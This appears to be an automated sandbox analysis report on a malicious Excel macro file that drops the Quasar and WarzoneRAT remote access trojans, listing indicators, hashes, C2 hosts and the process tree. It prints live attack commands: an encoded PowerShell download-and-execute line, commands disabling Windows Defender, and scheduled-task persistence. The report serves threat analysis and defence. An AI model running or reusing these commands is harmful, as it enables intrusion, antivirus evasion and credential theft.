quasar | ba6105bdabf9b3b9d3358b2aee50d2ac5eea4168daa03ad59062d419d7c372fe

Analysis

max time kernel
119s
max time network
155s
platform
windows10_x64
resource
win10-en-20211208
submitted
22-12-2021 16:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161.xlsm
Size

73KB
MD5

0a2ddcbe4687cf927ba02d332aa2a6d6
SHA1

b7fdb409e76495b4bcfb374d68cfcf919fbb4afe
SHA256

d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161
SHA512

834a3d6ba33aa7693c962dd690d02d6f63cd8ccbda107a60ed844a28d765ffb5f55e3e51d12eeec7059e6ee52866a7db2d0ad7cb4b8b6ebf500725afcf381240

Score

10^/10

quasar warzonerat success collection infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://marks397.co.za/FRE/MAEK.pif

Extracted

Family

warzonerat

jerenyankipong.duckdns.org:5200

Extracted

Family

quasar

Version

1.3.0.0

Botnet

SUCCESS

jerenyankipong.duckdns.org:4782

Mutex

MUTEX_jh9iPmixBt74IpSqEj

Attributes

encryption_key
uO9yacYVMmi8921rParX
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
cmd
subdirectory
SubDir

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

Ikjhyqgjrhtnkeaopbpxoay.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Thunderbird\\thunderbird.exe\","	Ikjhyqgjrhtnkeaopbpxoay.exe

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2076	2648	cmd.exe	EXCEL.EXE

Quasar Payload 8 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe	family_quasar
C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe	family_quasar
behavioral2/memory/3896-436-0x0000000000970000-0x00000000009CE000-memory.dmp	family_quasar
behavioral2/memory/3896-437-0x0000000000970000-0x00000000009CE000-memory.dmp	family_quasar
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe	family_quasar
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe	family_quasar
behavioral2/memory/3568-503-0x0000000000C10000-0x0000000000C6E000-memory.dmp	family_quasar
behavioral2/memory/3568-504-0x0000000000C10000-0x0000000000C6E000-memory.dmp	family_quasar

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Nirsoft 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe	Nirsoft

Warzone RAT Payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1152-348-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/1152-354-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

39 3876 powershell.exe
Downloads MZ/PE file

flow	pid	process
39	3876	powershell.exe

Executes dropped EXE 8 IoCs

Processes:

Ikjhyqgjrhtnkeaopbpxoay.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeIkjhyqgjrhtnkeaopbpxoay.exeBHpIzmsFC.exeClient.exe

pid	process
1044	Ikjhyqgjrhtnkeaopbpxoay.exe
2052	AdvancedRun.exe
3188	AdvancedRun.exe
4028	AdvancedRun.exe
812	AdvancedRun.exe
1152	Ikjhyqgjrhtnkeaopbpxoay.exe
3896	BHpIzmsFC.exe
3568	Client.exe

Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

2648 EXCEL.EXE

Loads dropped DLL 6 IoCs

Processes:

Ikjhyqgjrhtnkeaopbpxoay.exe

pid	process
1152	Ikjhyqgjrhtnkeaopbpxoay.exe
1152	Ikjhyqgjrhtnkeaopbpxoay.exe
1152	Ikjhyqgjrhtnkeaopbpxoay.exe
1152	Ikjhyqgjrhtnkeaopbpxoay.exe
1152	Ikjhyqgjrhtnkeaopbpxoay.exe
1152	Ikjhyqgjrhtnkeaopbpxoay.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 2 IoCs

collection

Email Collection

T1114

Processes:

Ikjhyqgjrhtnkeaopbpxoay.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Ikjhyqgjrhtnkeaopbpxoay.exe
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Ikjhyqgjrhtnkeaopbpxoay.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

52 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

Ikjhyqgjrhtnkeaopbpxoay.exe

description pid process target process

PID 1044 set thread context of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
52	ip-api.com

description	pid	process	target process
PID 1044 set thread context of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3152 schtasks.exe
2512 schtasks.exe

pid	process
3152	schtasks.exe
2512	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

NTFS ADS 1 IoCs

Processes:

EXCEL.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\F7C57F00\:Zone.Identifier:$DATA EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2648 EXCEL.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\F7C57F00\:Zone.Identifier:$DATA	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeIkjhyqgjrhtnkeaopbpxoay.exepowershell.exepowershell.exe

pid	process
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
2052	AdvancedRun.exe
2052	AdvancedRun.exe
2052	AdvancedRun.exe
2052	AdvancedRun.exe
3188	AdvancedRun.exe
3188	AdvancedRun.exe
3188	AdvancedRun.exe
3188	AdvancedRun.exe
4028	AdvancedRun.exe
4028	AdvancedRun.exe
4028	AdvancedRun.exe
4028	AdvancedRun.exe
812	AdvancedRun.exe
812	AdvancedRun.exe
812	AdvancedRun.exe
812	AdvancedRun.exe
1044	Ikjhyqgjrhtnkeaopbpxoay.exe
1044	Ikjhyqgjrhtnkeaopbpxoay.exe
2544	powershell.exe
2544	powershell.exe
2544	powershell.exe
664	powershell.exe
664	powershell.exe
664	powershell.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

2648 EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exeIkjhyqgjrhtnkeaopbpxoay.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exepowershell.exepowershell.exeBHpIzmsFC.exeClient.exe

description	pid	process
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	1044	Ikjhyqgjrhtnkeaopbpxoay.exe
Token: SeDebugPrivilege	2052	AdvancedRun.exe
Token: SeImpersonatePrivilege	2052	AdvancedRun.exe
Token: SeDebugPrivilege	3188	AdvancedRun.exe
Token: SeImpersonatePrivilege	3188	AdvancedRun.exe
Token: SeDebugPrivilege	4028	AdvancedRun.exe
Token: SeImpersonatePrivilege	4028	AdvancedRun.exe
Token: SeDebugPrivilege	812	AdvancedRun.exe
Token: SeImpersonatePrivilege	812	AdvancedRun.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	664	powershell.exe
Token: SeDebugPrivilege	3896	BHpIzmsFC.exe
Token: SeDebugPrivilege	3568	Client.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

2648 EXCEL.EXE
2648 EXCEL.EXE

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

EXCEL.EXEIkjhyqgjrhtnkeaopbpxoay.exeClient.exe

pid	process
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
1152	Ikjhyqgjrhtnkeaopbpxoay.exe
3568	Client.exe

Suspicious use of WriteProcessMemory 53 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeIkjhyqgjrhtnkeaopbpxoay.exeAdvancedRun.exeAdvancedRun.exeIkjhyqgjrhtnkeaopbpxoay.exeBHpIzmsFC.exeClient.exe

description	pid	process	target process
PID 2648 wrote to memory of 2076	2648	EXCEL.EXE	cmd.exe
PID 2648 wrote to memory of 2076	2648	EXCEL.EXE	cmd.exe
PID 2076 wrote to memory of 3876	2076	cmd.exe	powershell.exe
PID 2076 wrote to memory of 3876	2076	cmd.exe	powershell.exe
PID 3876 wrote to memory of 1044	3876	powershell.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 3876 wrote to memory of 1044	3876	powershell.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 3876 wrote to memory of 1044	3876	powershell.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 2052	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	AdvancedRun.exe
PID 1044 wrote to memory of 2052	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	AdvancedRun.exe
PID 1044 wrote to memory of 2052	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	AdvancedRun.exe
PID 2052 wrote to memory of 3188	2052	AdvancedRun.exe	AdvancedRun.exe
PID 2052 wrote to memory of 3188	2052	AdvancedRun.exe	AdvancedRun.exe
PID 2052 wrote to memory of 3188	2052	AdvancedRun.exe	AdvancedRun.exe
PID 1044 wrote to memory of 4028	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	AdvancedRun.exe
PID 1044 wrote to memory of 4028	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	AdvancedRun.exe
PID 1044 wrote to memory of 4028	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	AdvancedRun.exe
PID 4028 wrote to memory of 812	4028	AdvancedRun.exe	AdvancedRun.exe
PID 4028 wrote to memory of 812	4028	AdvancedRun.exe	AdvancedRun.exe
PID 4028 wrote to memory of 812	4028	AdvancedRun.exe	AdvancedRun.exe
PID 1044 wrote to memory of 2544	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	powershell.exe
PID 1044 wrote to memory of 2544	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	powershell.exe
PID 1044 wrote to memory of 2544	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	powershell.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1044 wrote to memory of 1152	1044	Ikjhyqgjrhtnkeaopbpxoay.exe	Ikjhyqgjrhtnkeaopbpxoay.exe
PID 1152 wrote to memory of 664	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	powershell.exe
PID 1152 wrote to memory of 664	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	powershell.exe
PID 1152 wrote to memory of 664	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	powershell.exe
PID 1152 wrote to memory of 660	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	cmd.exe
PID 1152 wrote to memory of 660	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	cmd.exe
PID 1152 wrote to memory of 660	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	cmd.exe
PID 1152 wrote to memory of 660	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	cmd.exe
PID 1152 wrote to memory of 660	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	cmd.exe
PID 1152 wrote to memory of 3896	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	BHpIzmsFC.exe
PID 1152 wrote to memory of 3896	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	BHpIzmsFC.exe
PID 1152 wrote to memory of 3896	1152	Ikjhyqgjrhtnkeaopbpxoay.exe	BHpIzmsFC.exe
PID 3896 wrote to memory of 3152	3896	BHpIzmsFC.exe	schtasks.exe
PID 3896 wrote to memory of 3152	3896	BHpIzmsFC.exe	schtasks.exe
PID 3896 wrote to memory of 3152	3896	BHpIzmsFC.exe	schtasks.exe
PID 3896 wrote to memory of 3568	3896	BHpIzmsFC.exe	Client.exe
PID 3896 wrote to memory of 3568	3896	BHpIzmsFC.exe	Client.exe
PID 3896 wrote to memory of 3568	3896	BHpIzmsFC.exe	Client.exe
PID 3568 wrote to memory of 2512	3568	Client.exe	schtasks.exe
PID 3568 wrote to memory of 2512	3568	Client.exe	schtasks.exe
PID 3568 wrote to memory of 2512	3568	Client.exe	schtasks.exe

outlook_office_path 1 IoCs

Processes:

Ikjhyqgjrhtnkeaopbpxoay.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Ikjhyqgjrhtnkeaopbpxoay.exe

outlook_win_path 1 IoCs

Processes:

Ikjhyqgjrhtnkeaopbpxoay.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Ikjhyqgjrhtnkeaopbpxoay.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161.xlsm"
1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Uzosupxyvem.bat
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBJAGsAagBoAHkAcQBnAGoAcgBoAHQAbgBrAGUAYQBvAHAAYgBwAHgAbwBhAHkALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcABzADoALwAvAG0AYQByAGsAcwAzADkANwAuAGMAbwAuAHoAYQAvAEYAUgBFAC8ATQBBAEUASwAuAHAAaQBmACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3876
  - - C:\Users\Admin\AppData\Roaming\Ikjhyqgjrhtnkeaopbpxoay.exe
      "C:\Users\Admin\AppData\Roaming\Ikjhyqgjrhtnkeaopbpxoay.exe"
      4⤵
      Modifies WinLogon for persistence
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1044
    - - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2052
      - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 2052
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3188
    - - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4028
      - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 4028
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:812
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\Ikjhyqgjrhtnkeaopbpxoay.exe" -Force
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544
    - - C:\Users\Admin\AppData\Local\Temp\Ikjhyqgjrhtnkeaopbpxoay.exe
        
        C:\Users\Admin\AppData\Local\Temp\Ikjhyqgjrhtnkeaopbpxoay.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Accesses Microsoft Outlook profiles
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        outlook_office_path
        outlook_win_path
        
        PID:1152
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:664
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe"
        6⤵
        
        PID:660
      - C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe
        
        "C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3896
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "cmd" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe" /rl HIGHEST /f
        7⤵
        Creates scheduled task(s)
        
        PID:3152
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3568
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "cmd" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Creates scheduled task(s)
        
        PID:2512

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5
224eab1ee8f8bbf6b4683fb79b6055d1

SHA1
33cd2fdabbbc241411b813a9a27004ac36e750c1

SHA256
9adb51554502af88dcce67501fcf525760236a704332e44775d00cd132c23032

SHA512
8b2cfe4959f86f2f67e64d98c44ffd8bb8f9fc04a3a7cad4b8a07d313efb5269ee6986d13c7cfe08e9867bcd70f486c9e60880e78b0d15ab788d4b2075d049a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
81089ac5e84830e4ed42972b8a4c1669

SHA1
447052cc74930cfb4388952465eb3874714ad1e0

SHA256
b867bb8eb79ae78b9095c540cce72c10bea7c97d34b28d6ea8a06a0ffbd48efd

SHA512
16589ca480413d23c854ceb3f64b4927bc221cf08a13a2c8bc4e7d69e06efe03ac73ed9edb6a9a8cd082636fea8d2af97d17d4ecc7b3fe4663c8e56d9642acb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
c63e55d993a26d3cf2aad99de2671b41

SHA1
d42507390e70ea9b85d72bc1f452862ff2efe7cd

SHA256
428ced58aad58048afec9301edf473ebb0dc07639c16c6ddeec910137bd1fb91

SHA512
21c636e6e063aab2d0c4409be8c0bb44ad4dcda28a846a4d9ae371e9010f4f2c58a7d781161320c0222d07ad437125bf68aa78cdfb98cea279375472d4fcfc77

Download Submit
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe

MD5
17fc12902f4769af3a9271eb4e2dacce

SHA1
9a4a1581cc3971579574f837e110f3bd6d529dab

SHA256
29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

SHA512
036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe

MD5
17fc12902f4769af3a9271eb4e2dacce

SHA1
9a4a1581cc3971579574f837e110f3bd6d529dab

SHA256
29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

SHA512
036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe

MD5
17fc12902f4769af3a9271eb4e2dacce

SHA1
9a4a1581cc3971579574f837e110f3bd6d529dab

SHA256
29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

SHA512
036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe

MD5
17fc12902f4769af3a9271eb4e2dacce

SHA1
9a4a1581cc3971579574f837e110f3bd6d529dab

SHA256
29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

SHA512
036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe

MD5
17fc12902f4769af3a9271eb4e2dacce

SHA1
9a4a1581cc3971579574f837e110f3bd6d529dab

SHA256
29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

SHA512
036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ikjhyqgjrhtnkeaopbpxoay.exe

MD5
6d5f00a23f0fc84d7e44a9dbcd31e0b4

SHA1
fcfe53ac6c4727a7d711415632882fc7f5569491

SHA256
343547ccd4990682ba60ae259bf210c4a1078e3de6cee1fcfa48d345d83e23e5

SHA512
15cc6af9e8492358ee9041ddb709a87e64723ee41d775ca17ac63a6c1725b006f893313c5cb4bd1cc237dcce6d410900485cd62aa9f4075d308829e1e6994236

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ikjhyqgjrhtnkeaopbpxoay.exe

MD5
6d5f00a23f0fc84d7e44a9dbcd31e0b4

SHA1
fcfe53ac6c4727a7d711415632882fc7f5569491

SHA256
343547ccd4990682ba60ae259bf210c4a1078e3de6cee1fcfa48d345d83e23e5

SHA512
15cc6af9e8492358ee9041ddb709a87e64723ee41d775ca17ac63a6c1725b006f893313c5cb4bd1cc237dcce6d410900485cd62aa9f4075d308829e1e6994236

Download Submit
C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe

MD5
7411c8d36761ca9edc88373cfc7a3cb7

SHA1
8b31d6b61ee03da19817d3ffd59c0aa41ef32d81

SHA256
5ab1aac03c053e025319aac9bbe317a163d56bf4657819c6a43ffb97099ec322

SHA512
37f29a792ca641f29144032575f7f42ced5345c541cbdad33e935ef7b5b70d6b5623196596587be95ef00a86a58d604c295c1fcc4a9b159b80cc273fe1623342

Download Submit
C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe

MD5
